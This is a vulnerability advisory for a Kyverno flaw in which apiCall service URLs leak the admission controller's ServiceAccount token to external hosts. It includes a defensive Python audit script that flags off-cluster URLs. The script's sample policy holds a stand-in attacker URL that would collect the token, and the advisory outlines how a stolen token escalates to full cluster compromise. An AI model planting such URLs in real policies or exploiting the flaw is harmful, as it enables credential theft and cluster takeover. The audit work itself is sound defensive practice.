CVE-2026-41323: Kyverno: ServiceAccount token leaked to external servers via apiCall service URL
Kyverno's apiCall feature in ClusterPolicy automatically attaches the admission controller's ServiceAccount token to outgoing HTTP requests. The service URL is not validated: it can point anywhere, including attacker-controlled servers. Because the admission controller's ServiceAccount has permission to patch webhook configurations, a stolen token leads to full cluster compromise.
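Added example (not Kyverno project code): a defender-side audit script that walks ClusterPolicy objects, as parsed from `kubectl get clusterpolicies -o json`, and flags every `context[].apiCall.service.url` whose host is not an in-cluster Service name, since that is where the token described above would be sent. The in-cluster host suffixes and the sample policy are constructed assumptions for this example.

```python
"""Audit Kyverno ClusterPolicy objects for apiCall service URLs that leave the cluster."""
from urllib.parse import urlsplit

# Assumed allow-list of hosts that resolve inside the cluster; adjust to your cluster DNS.
IN_CLUSTER_SUFFIXES = (".svc", ".svc.cluster.local")
IN_CLUSTER_HOSTS = {"kubernetes.default", "kubernetes.default.svc"}


def is_in_cluster(url: str) -> bool:
    """True when the URL's host looks like a Kubernetes Service, not an external host."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return False  # unparseable or host-less URL: treat as not trusted
    return host in IN_CLUSTER_HOSTS or host.endswith(IN_CLUSTER_SUFFIXES)


def find_external_api_calls(policy: dict) -> list:
    """Return (policy, rule, context, url) for each apiCall.service.url that is off-cluster.

    Contexts that use only `urlPath` talk to the Kubernetes API and are not reported.
    """
    findings = []
    policy_name = policy.get("metadata", {}).get("name", "<unnamed>")
    for rule in policy.get("spec", {}).get("rules", []):
        for ctx in rule.get("context") or []:
            service = (ctx.get("apiCall") or {}).get("service") or {}
            url = service.get("url")
            if url and not is_in_cluster(url):
                findings.append((policy_name, rule.get("name", "<unnamed>"),
                                 ctx.get("name", "<unnamed>"), url))
    return findings


# Constructed sample policy in the shape of `kubectl get clusterpolicies -o json`.
SAMPLE_POLICY = {
    "metadata": {"name": "sample-policy"},
    "spec": {"rules": [
        {"name": "check-internal", "context": [
            {"name": "svc", "apiCall": {"service": {"url": "https://my-api.kyverno.svc:8443/check"}}},
            {"name": "k8s", "apiCall": {"urlPath": "/api/v1/namespaces", "jmesPath": "items[].metadata.name"}},
        ]},
        {"name": "check-external", "context": [
            {"name": "remote", "apiCall": {"service": {"url": "https://attacker.example.com/collect"}}},
        ]},
    ]},
}

if __name__ == "__main__":
    for finding in find_external_api_calls(SAMPLE_POLICY):
        print("external apiCall target: policy=%s rule=%s context=%s url=%s" % finding)
```

Run it against the live output of `kubectl get clusterpolicies -o json` by iterating over `items` and passing each policy to `find_external_api_calls`.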
References
- github.com/advisories/GHSA-f9g8-6ppc-pqq4
- github.com/kyverno/kyverno/commit/bc4f91c4801b1eaa2edc0a14e2f1b0af8cf0c1f5
- github.com/kyverno/kyverno/commit/c2eab00033e635bda4e4efb58c1b472b41728bb6
- github.com/kyverno/kyverno/commit/f70e8ac1e7acd2e3844f9553e4a884f07f953de0
- github.com/kyverno/kyverno/security/advisories/GHSA-f9g8-6ppc-pqq4
- nvd.nist.gov/vuln/detail/CVE-2026-41323